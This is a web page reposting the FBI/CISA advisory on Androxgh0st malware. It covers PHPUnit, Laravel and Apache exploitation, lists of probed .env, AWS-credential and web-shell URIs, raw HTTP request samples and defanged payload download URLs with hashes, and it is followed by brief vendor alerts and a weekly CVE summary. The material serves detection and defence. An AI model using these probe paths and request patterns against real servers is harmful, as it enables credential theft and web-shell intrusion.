DefendEdge Logo
Contact
Engage with Us
Contact
Engage with Us

Category: alerts

Cyber Security Monitor Alerts News Notifications. We monitor and send notifications on the latest Cyber Security alerts, blogs, news on data breaches and emerging cyber threats.

Categories
alerts

Known Indicators of Compromise Associated with Androxgh0st Malware

SUMMARY

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with threat actors deploying Androxgh0st malware. Multiple, ongoing investigations and trusted third party reporting yielded the IOCs and TTPs, and provided information on Androxgh0st malware’s ability to establish a botnet that can further identify and compromise vulnerable networks.

The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of cybersecurity incidents caused by Androxgh0st infections.

Download the PDF version of this report:

AA24-016A Known Indicators of Compromise Associated with Androxgh0st Malware
(PDF, 569.31 KB
)

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Overview

Androxgh0st malware has been observed establishing a botnet [T1583.005] for victim identification and exploitation in target networks. According to open source reporting[1], Androxgh0st is a Python-scripted malware [T1059.006] primarily used to target .env files that contain confidential information, such as credentials [T1552.001] for various high profile applications (i.e., Amazon Web Services [AWS], Microsoft Office 365, SendGrid, and Twilio from the Laravel web application framework). Androxgh0st malware also supports numerous functions capable of abusing the Simple Mail Transfer Protocol (SMTP), such as scanning [T1046] and exploiting exposed credentials [T1078] and application programming interfaces (APIs) [T1114], and web shell deployment [T1505.003].

Targeting the PHPUnit

Androxgh0st malware TTPs commonly involves the use of scripts, conducting scanning [T1595] and searching for websites with specific vulnerabilities. In particular, threat actors deploying Androxgh0st have been observed exploiting CVE-2017-9841 to remotely run hypertext preprocessor (PHP) code on fallible websites via PHPUnit [T1190]. Websites using the PHPUnit module that have internet-accessible (exposed) /vendor folders are subject to malicious HTTP POST requests to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php uniform resource identifier (URI). This PHP page runs PHP code submitted through a POST request, which allows the threat actors to remotely execute code.

Malicious actors likely use Androxgh0st to download malicious files [T1105] to the system hosting the website. Threat actors are further able to set up a fake (illegitimate) page accessible via the URI to provide backdoor access to the website. This allows threat actors to download additional malicious files for their operations and access databases.

Laravel Framework Targeting

Androxgh0st malware establishes a botnet to scan for websites using the Laravel web application framework. After identifying websites using the Laravel web application, threat actors attempt to determine if the domain’s root-level .env file is exposed and contains credentials for accessing additional services. Note: .env files commonly store credentials and tokens. Threat actors often target .env files to steal these credentials within the environment variables.

If the .env file is exposed, threat actors will issue a GET request to the /.env URI to attempt to access the data on the page. Alternatively, Androxgh0st may issue a POST request to the same URI with a POST variable named 0x[] containing certain data sent to the web server. This data is frequently used as an identifier for the threat actor. This method appears to be used for websites in debug mode (i.e., when non-production websites are exposed to the internet). A successful response from either of these methods allows the threat actors to look for usernames, passwords, and/or other credentials pertaining to services such as email (via SMTP) and AWS accounts.

Androxgh0st malware can also access the application key [TA0006] for the Laravel application on the website. If the threat actors successfully identify the Laravel application key, they will attempt exploitation by using the key to encrypt PHP code [T1027.010]. The encrypted code is then passed to the website as a value in the cross-site forgery request (XSRF) token cookie, XSRF-TOKEN, and included in a future GET request to the website. The vulnerability defined in CVE-2018-15133 indicates that on Laravel applications, XSRF token values are subject to an un-serialized call, which can allow for remote code execution. In doing so, the threat actors can upload files to the website via remote access.

Apache Web Server Targeting

In correlation with CVE-2021-41773, Androxgh0st actors have been observed scanning vulnerable web servers [T1595.002] running Apache HTTP Server versions 2.4.49 or 2.4.50. Threat actors can identify uniform resource locators (URLs) for files outside root directory through a path traversal attack [T1083]. If these files are not protected by the “request all denied” configuration and Common Gateway Interface (CGI) scripts are enabled, this may allow for remote code execution.

If threat actors obtain credentials for any services using the above methods, they may use these credentials to access sensitive data or use these services to conduct additional malicious operations. For example, when threat actors successfully identify and compromise AWS credentials from a vulnerable website, they have been observed attempting to create new users and user policies [T1136]. Additionally, Andoxgh0st actors have been observed creating new AWS instances to use for conducting additional scanning activity [T1583.006].

INDICATORS OF COMPROMISE (IOCs)

Based on investigations and analysis, the following requests are associated with Androxgh0st activity:

  • Incoming GET and POST requests to the following URIs:
    • /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
    • /.env
  • Incoming POST requests with the following strings:
    • [0x%5B%5D=androxgh0st]
    • ImmutableMultiDict([('0x[]', 'androxgh0st')])

In both previously listed POST request strings, the name androxgh0st has been observed to be replaced with other monikers.

Additional URIs observed by the FBI and a trusted third party used by these threat actors for credential exfiltration include:

  • /info
  • /phpinfo
  • /phpinfo.php
  • /?phpinfo=1
  • /frontend_dev.php/$
  • /_profiler/phpinfo
  • /debug/default/view?panel=config
  • /config.json
  • /.json
  • /.git/config
  • /live_env
  • /.env.dist
  • /.env.save
  • /environments/.env.production
  • /.env.production.local
  • /.env.project
  • /.env.development
  • /.env.production
  • /.env.prod
  • /.env.development.local
  • /.env.old
  • //.env
    • Note: the actor may attempt multiple different potential URI endpoints scanning for the .env file, for example /docker/.env or /local/.env.
  • /.aws/credentials
  • /aws/credentials
  • /.aws/config
  • /.git
  • /.test
  • /admin
  • /backend
  • /app
  • /current
  • /demo
  • /api
  • /backup
  • /beta
  • /cron
  • /develop
  • /Laravel
  • /laravel/core
  • /gists/cache
  • /test.php
  • /info.php
  • //.env
  • /admin-app/.env%20
  • /laravel/.env%20
  • /shared/.env%20
  • /.env.project%20
  • /apps/.env%20
  • /development/.env%20
  • /live_env%20
  • /.env.development%20
Targeted URIs for web-shell drop:
  • /.env/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //dev/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //lib/phpunit/phpunit/Util/PHP/eval-stdin.php
  • //lib/phpunit/src/Util/PHP/eval-stdin.php
  • //lib/phpunit/Util/PHP/eval-stdin.php
  • //new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //phpunit/phpunit/Util/PHP/eval-stdin.php
  • //phpunit/src/Util/PHP/eval-stdin.php
  • //phpunit/Util/PHP/eval-stdin.php
  • //protected/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/evalstdin.php
  • //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  • //vendor/phpunit/src/Util/PHP/eval-stdin.php
  • //vendor/phpunit/Util/PHP/eval-stdin.php
  • //wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • //www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /admin/ckeditor/plugins/ajaxplorer/phpunit/src/Util/PHP/eval-stdin.php
  • /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /api/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php
  • /lab/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /laravel_web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /laravelao/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /lib/phpunit/phpunit/Util/PHP/eval-stdin.php
  • /lib/phpunit/phpunit/Util/PHP/eval
  • stdin.php%20/lib/phpunit/src/Util/PHP/eval-stdin.php
  • /lib/phpunit/src/Util/PHP/eval-stdin.php
  • /lib/phpunit/Util/PHP/eval-stdin.php
  • /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /libraries/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /phpunit/phpunit/Util/PHP/eval-stdin.php
  • /phpunit/phpunit/Util/PHP/eval-stdin.php%20/phpunit/src/Util/PHP/evalstdin.php
  • /phpunit/src/Util/PHP/eval-stdin.php
  • ./phpunit/Util/PHP/eval-stdin.php
  • /phpunit/Util/PHP/eval-stdin.php%20/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php.dev
  • /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
  • /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php%20/vendor/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/src/Util/PHP/eval-stdin.php
  • /vendor/phpunit/Util/PHP/eval-stdin.php
  • /vendor/phpunit/Util/PHP/eval-stdin.php%20
  • /phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
An example of attempted credential exfiltration through (honeypot) open proxies:

POST /.aws/credentials HTTP/1.1
host: www.example.com
user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
accept-encoding: gzip, deflate
accept: */*
connection: keep-alive
content-length: 20
content-type: application/x-www-form-urlencoded

0x%5B%5D=androxgh0st

An example of attempted web-shell drop through (honeypot) open proxies:

GET http://www.example.com/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
host: www.example.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.76
accept-encoding: gzip, deflate
accept: */*
connection: keep-alive
x-forwarded-for: 200.172.238.135
content-length: 279

Monikers used instead of Androxgh0st (0x%5B%5D=???):
  • Ridho
  • Aws
  • 0x_0x
  • x_X
  • nopebee7
  • SMTPEX
  • evileyes0
  • privangga
  • drcrypter
  • errorcool
  • drosteam
  • androxmen
  • crack3rz
  • b4bbyghost
  • 0x0day
  • janc0xsec
  • blackb0x
  • 0x1331day
  • Graber
Example malware drops through eval-stdin.php:

hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt
59e90be75e51c86b4b9b69dcede2cf815da5a79f7e05cac27c95ec35294151f4

hxxps://chainventures.co[.]uk/.well-known/aas
dcf8f640dd7cc27d2399cce96b1cf4b75e3b9f2dfdf19cee0a170e5a6d2ce6b6

hxxp://download.asyncfox[.]xyz/download/xmrig.x86_64
23fc51fde90d98daee27499a7ff94065f7ed4ac09c22867ebd9199e025dee066

hxxps://pastebin[.]com/raw/zw0gAmpC
ca45a14d0e88e4aa408a6ac2ee3012bf9994b16b74e3c66b588c7eabaaec4d72

hxxp://raw.githubusercontent[.]com/0x5a455553/MARIJUANA/master/MARIJUANA.php
0df17ad20bf796ed549c240856ac2bf9ceb19f21a8cae2dbd7d99369ecd317ef

hxxp://45.95.147[.]236/tmp.x86_64
6b5846f32d8009e6b54743d6f817f0c3519be6f370a0917bf455d3d114820bbc

hxxp://main.dsn[.]ovh/dns/pwer
bb7070cbede294963328119d1145546c2e26709c5cea1d876d234b991682c0b7

hxxp://tangible-drink.surge[.]sh/configx.txt
de1114a09cbab5ae9c1011ddd11719f15087cc29c8303da2e71d861b0594a1ba

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 1-10 for all referenced threat actor tactics and techniques in this advisory.

Table 1: Reconnaissance
Technique Title ID Use

Active Scanning: Vulnerability Scanning

T1595.002

The threat actor scans websites for specific vulnerabilities to exploit.
Table 2: Resource Development
Technique Title ID Use

Acquire Infrastructure: Botnet

T1583.005

The threat actor establishes a botnet to identify and exploit victims.

Acquire Infrastructure: Web Services

T1583.006

The threat actor creates new AWS instances to use for scanning.
Table 3: Initial Access
Technique Title ID Use

Exploit Public-Facing Application

T1190

The threat actor exploits CVE-2017-9841 to remotely run hypertext preprocessor (PHP) code on websites via PHPUnit.
Table 4: Execution
Technique Title ID Use

Command and Scripting Interpreter: Python

T1059.006

The threat actor uses Androxgh0st, a Python-scripted malware, to target victim files.
Table 5: Persistence
Technique Title ID Use

Valid Accounts

T1078

The threat actor abuses the simple mail transfer protocol (SMTP) by exploiting exposed credentials.

Server Software Component: Web Shell

T1505.003

The threat actor deploys web shells to maintain persistent access to systems.

Create Account

T1136

The threat actor attempts to create new users and user policies with compromised AWS credentials from a vulnerable website.
Table 6: Defense Evasion
Technique Title ID Use

Obfuscated Files or Information: Command Obfuscation

T1027.010

The threat actor can exploit a successfully identified Laravel application key to encrypt PHP code, which is then passed to the site as a value in the XSRF-TOKEN cookie.
Table 7: Credential Access
Technique Title ID Use

Credential Access

TA0006

The threat actor can access the application key of the Laravel application on the site.

Unsecured Credentials: Credentials in Files

T1552.001

The threat actor targets .env files that contain confidential credential information.
Table 8: Discovery
Technique Title ID Use

File and Directory Discovery

T1083

The threat actor can identify URLs for files outside root directory through a path traversal attack.

Network Service Discovery

T1046

The threat actor uses Androxgh0st to abuse simple mail transfer protocol (SMTP) via scanning.
Table 9: Collection
Technique Title ID Use

Email Collection

T1114

The threat actor interacts with application programming interfaces (APIs) to gather information.
Table 10: Command and Control
Technique Title ID Use

Ingress Tool Transfer

T1105

The threat actor runs PHP code through a POST request to download malicious files to the system hosting the website.

MITIGATIONS

The FBI and CISA recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on Androxgh0st threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

These mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufacturers incorporate secure by design principles and tactics into their software development practices, limiting the impact of actor techniques and strengthening their customers’ security posture. For more information on secure by design, see CISA’s Secure by Design webpage.

The FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by actors using Androxgh0st malware.

  • Keep all operating systems, software, and firmware up to date. Specifically, ensure that Apache servers are not running versions 2.4.49 or 2.4.50. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems.
  • Verify that the default configuration for all URIs is to deny all requests unless there is a specific need for it to be accessible.
  • Ensure that any live Laravel applications are not in “debug” or testing mode. Remove all cloud credentials from .env files and revoke them. All cloud providers have safer ways to provide temporary, frequently rotated credentials to code running inside a web server without storing them in any file.
  • On a one-time basis for previously stored cloud credentials, and on an on-going basis for other types of credentials that cannot be removed, review any platforms or services that have credentials listed in the .env file for unauthorized access or use.
  • Scan the server’s file system for unrecognized PHP files, particularly in the root directory or /vendor/phpunit/phpunit/src/Util/PHP folder.
  • Review outgoing GET requests (via cURL command) to file hosting sites such as GitHub, pastebin, etc., particularly when the request accesses a .php file.

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Tables 1-10).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

REPORTING

The FBI encourages organizations to report information concerning suspicious or criminal activity to their local FBI field office. With regards to specific information that appears in this CSA, indicators should always be evaluated in light of an organization’s complete security situation.

When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Reports can be submitted to the FBI Internet Crime Complaint Center (IC3), a local FBI Field Office, or to CISA via its Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or (888) 282-0870.

RESOURCES

REFERENCES

  1. Fortinet – FortiGuard Labs: Threat Signal Report: AndroxGh0st Malware Actively Used in the Wild

ACKNOWLEDGEMENTS

Amazon contributed to this CSA.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA.

VERSION HISTORY

January 16, 2024: Initial version.

Categories
alerts

Cisco Releases Security Advisory for Cisco Unity Connection

Cisco released a security advisory to address a vulnerability (CVE-2024-20272) in Cisco Unity Connection. A cyber threat actor could exploit this vulnerability to take control of an affected system.

CISA encourages users and administrators to review the Cisco Unity Connection Unauthenticated Arbitrary File Upload Vulnerability advisory and apply the necessary updates.

Categories
alerts

Juniper Networks Releases Security Bulletin for Junos OS and Junos OS Evolved

Juniper Networks has released a security advisory to address a vulnerability (CVE-2024-21611) in Junos OS and Junos OS Evolved. A cyber threat actor could exploit this vulnerability to cause a denial-of-service condition.

CISA encourages users and administrators to review the Juniper Advisory JSA75752 and apply the necessary updates.

Categories
alerts

Ivanti Releases Security Update for Connect Secure and Policy Secure Gateways

Ivanti has released a security update to address an authentication bypass vulnerability (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887) in all supported versions (9.x and 22.x) of Connect Secure and Policy Secure gateways. A cyber threat actor could exploit these vulnerabilities to take control of an affected system.
 
Ivanti reports active exploitation of both CVE-2023-46805 and CVE-2024-21887.
 
CISA urges users and administrators to immediately review Ivanti’s security update and apply the current workaround. CISA will update this alert as Ivanti releases patches.

Categories
alerts

Vulnerability Summary for the Week of January 1, 2024

 High Vulnerabilities

Primary
Vendor — Product		 Description Published CVSS Score Source & Patch Info
7-card — fakabao A vulnerability has been found in 7-card Fakabao up to 1.0_build20230805 and classified as critical. Affected by this vulnerability is an unknown functionality of the file shop/alipay_notify.php. The manipulation of the argument out_trade_no leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249385 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.8 CVE-2023-7183
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
7-card — fakabao A vulnerability was found in 7-card Fakabao up to 1.0_build20230805 and classified as critical. Affected by this issue is some unknown functionality of the file shop/notify.php. The manipulation of the argument out_trade_no leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-249386 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.8 CVE-2023-7184
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
7-card — fakabao A vulnerability was found in 7-card Fakabao up to 1.0_build20230805. It has been classified as critical. This affects an unknown part of the file shop/wxpay_notify.php. The manipulation of the argument out_trade_no leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249387. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.8 CVE-2023-7185
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
7-card — fakabao A vulnerability was found in 7-card Fakabao up to 1.0_build20230805. It has been declared as critical. This vulnerability affects unknown code of the file member/notify.php. The manipulation of the argument out_trade_no leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249388. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.8 CVE-2023-7186
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
amazon-ion — ion-java Amazon Ion is a Java implementation of the Ion data notation. Prior to version 1.10.5, a potential denial-of-service issue exists in `ion-java` for applications that use `ion-java` to deserialize Ion text encoded data, or deserialize Ion text or binary encoded data into the `IonValue` model and then invoke certain `IonValue` methods on that in-memory representation. An actor could craft Ion data that, when loaded by the affected application and/or processed using the `IonValue` model, results in a `StackOverflowError` originating from the `ion-java` library. The patch is included in `ion-java` 1.10.5. As a workaround, do not load data which originated from an untrusted source or that could have been tampered with. 2024-01-03 7.5 CVE-2024-21634
security-advisories@github.com
apache — dolphinscheduler Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed javascript to be executed on the server. This issue affects Apache DolphinScheduler: until 3.1.9. Users are recommended to upgrade to version 3.1.9, which fixes the issue. 2023-12-30 8.8 CVE-2023-49299
security@apache.org
security@apache.org
apktool — apktool Apktool is a tool for reverse engineering Android APK files. In versions 2.9.1 and prior, Apktool infers resource files’ output path according to their resource names which can be manipulated by attacker to place files at desired location on the system Apktool runs on. Affected environments are those in which an attacker may write/overwrite any file that user has write access, and either username is known or cwd is under user folder. Commit d348c43b24a9de350ff6e5bd610545a10c1fc712 contains a patch for this issue. 2024-01-03 7.8 CVE-2024-21633
security-advisories@github.com
security-advisories@github.com
campcodes — chic_beauty_salon A vulnerability classified as critical was found in Campcodes Chic Beauty Salon 20230703. Affected by this vulnerability is an unknown functionality of the file product-list.php of the component Product Handler. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249157 was assigned to this vulnerability. 2023-12-29 8.8 CVE-2023-7150
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
campcodes — online_college_library_system A vulnerability has been found in Campcodes Online College Library System 1.0 and classified as critical. This vulnerability affects unknown code of the file index.php of the component Search. The manipulation of the argument category leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249178 is the identifier assigned to this vulnerability. 2023-12-29 9.8 CVE-2023-7156
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
campcodes — online_college_library_system A vulnerability, which was classified as critical, has been found in Campcodes Online College Library System 1.0. This issue affects some unknown processing of the file /admin/book_row.php of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249365 was assigned to this vulnerability. 2023-12-30 7.2 CVE-2023-7178
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
campcodes — online_college_library_system A vulnerability classified as critical has been found in Campcodes Online College Library System 1.0. This affects an unknown part of the file /admin/return_add.php of the component HTTP POST Request Handler. The manipulation of the argument student leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249363. 2023-12-30 8.8 CVE-2023-7176
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
campcodes — online_college_library_system A vulnerability classified as critical was found in Campcodes Online College Library System 1.0. This vulnerability affects unknown code of the file /admin/book_add.php of the component HTTP POST Request Handler. The manipulation of the argument category leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249364. 2023-12-30 8.8 CVE-2023-7177
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
campcodes — online_college_library_system A vulnerability, which was classified as critical, was found in Campcodes Online College Library System 1.0. Affected is an unknown function of the file /admin/category_row.php of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249366 is the identifier assigned to this vulnerability. 2023-12-30 8.8 CVE-2023-7179
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cesanta — mjs An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs+0x4ec508 component. 2024-01-02 7.5 CVE-2023-49550
cve@mitre.org
cesanta — mjs An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_op_json_parse function in the msj.c file. 2024-01-02 7.5 CVE-2023-49551
cve@mitre.org
cloudflare,_inc. — miniflare Sending specially crafted HTTP requests to Miniflare’s server could result in arbitrary HTTP and WebSocket requests being sent from the server. If Miniflare was configured to listen on external network interfaces (as was the default in wrangler until 3.19.0), an attacker on the local network could access other local servers. 2023-12-29 8.1 CVE-2023-7078
cna@cloudflare.com
cna@cloudflare.com
cloudflare,_inc. — wrangler The V8 inspector intentionally allows arbitrary code execution within the Workers sandbox for debugging. wrangler dev would previously start an inspector server listening on all network interfaces. This would allow an attacker on the local network to connect to the inspector and run arbitrary code. Additionally, the inspector server did not validate Origin/Host headers, granting an attacker that can trick any user on the local network into opening a malicious website the ability to run code. If wrangler dev –remote was being used, an attacker could access production resources if they were bound to the worker. This issue was fixed in wrangler@3.19.0 and wrangler@2.20.2. Whilst wrangler dev’s inspector server listens on local interfaces by default as of wrangler@3.16.0, an SSRF vulnerability in miniflare https://github.com/cloudflare/workers-sdk/security/advisories/GHSA-fwvg-2739-22v7  (CVE-2023-7078) allowed access from the local network until wrangler@3.18.0. wrangler@3.19.0 and wrangler@2.20.2 introduced validation for the Origin/Host headers. 2023-12-29 8 CVE-2023-7080
cna@cloudflare.com
cna@cloudflare.com
cna@cloudflare.com
cna@cloudflare.com
cna@cloudflare.com
code-projects — client_details_system A vulnerability was found in code-projects Client Details System 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/update-clients.php. The manipulation of the argument uid leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249144. 2023-12-29 9.8 CVE-2023-7141
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — client_details_system A vulnerability was found in code-projects Client Details System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/clientview.php. The manipulation of the argument ID leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249145 was assigned to this vulnerability. 2023-12-29 9.8 CVE-2023-7142
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — college_notes_gallery A vulnerability has been found in code-projects College Notes Gallery 2.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument user leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249133 was assigned to this vulnerability. 2023-12-31 8.8 CVE-2023-7130
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
codeastro — online_food_ordering_system A vulnerability classified as critical was found in CodeAstro Online Food Ordering System 1.0. This vulnerability affects unknown code of the file /admin/ of the component Admin Panel. The manipulation of the argument Username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249778 is the identifier assigned to this vulnerability. 2024-01-05 7.3 CVE-2024-0247
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
coolkit_technology — ewelink-smart_home_for_android_and_ios Improper privilege management vulnerability in CoolKit Technology eWeLink on Android and iOS allows application lockscreen bypass. This issue affects eWeLink before 5.2.0. 2023-12-30 7.7 CVE-2023-6998
cvd@cert.pl
cvd@cert.pl
cvd@cert.pl
dedebiz — dedebiz A vulnerability was found in Muyun DedeBIZ up to 6.2.12 and classified as critical. Affected by this issue is some unknown functionality of the component Add Attachment Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249368. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-30 7.2 CVE-2023-7181
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
documize — documize SQL Injection vulnerability in Documize version 5.4.2, allows remote attackers to execute arbitrary code via the user parameter of the /api/dashboard/activity endpoint. 2023-12-29 9.8 CVE-2023-23634
cve@mitre.org
easy-rules-mvel — easy-rules-mvel easy-rules-mvel v4.1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component MVELRule. 2023-12-29 7.8 CVE-2023-50571
cve@mitre.org
ekol_informatics — website_template Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Ekol Informatics Website Template allows SQL Injection. This issue affects Website Template: through 20231215. 2024-01-02 9.8 CVE-2023-6436
iletisim@usom.gov.tr
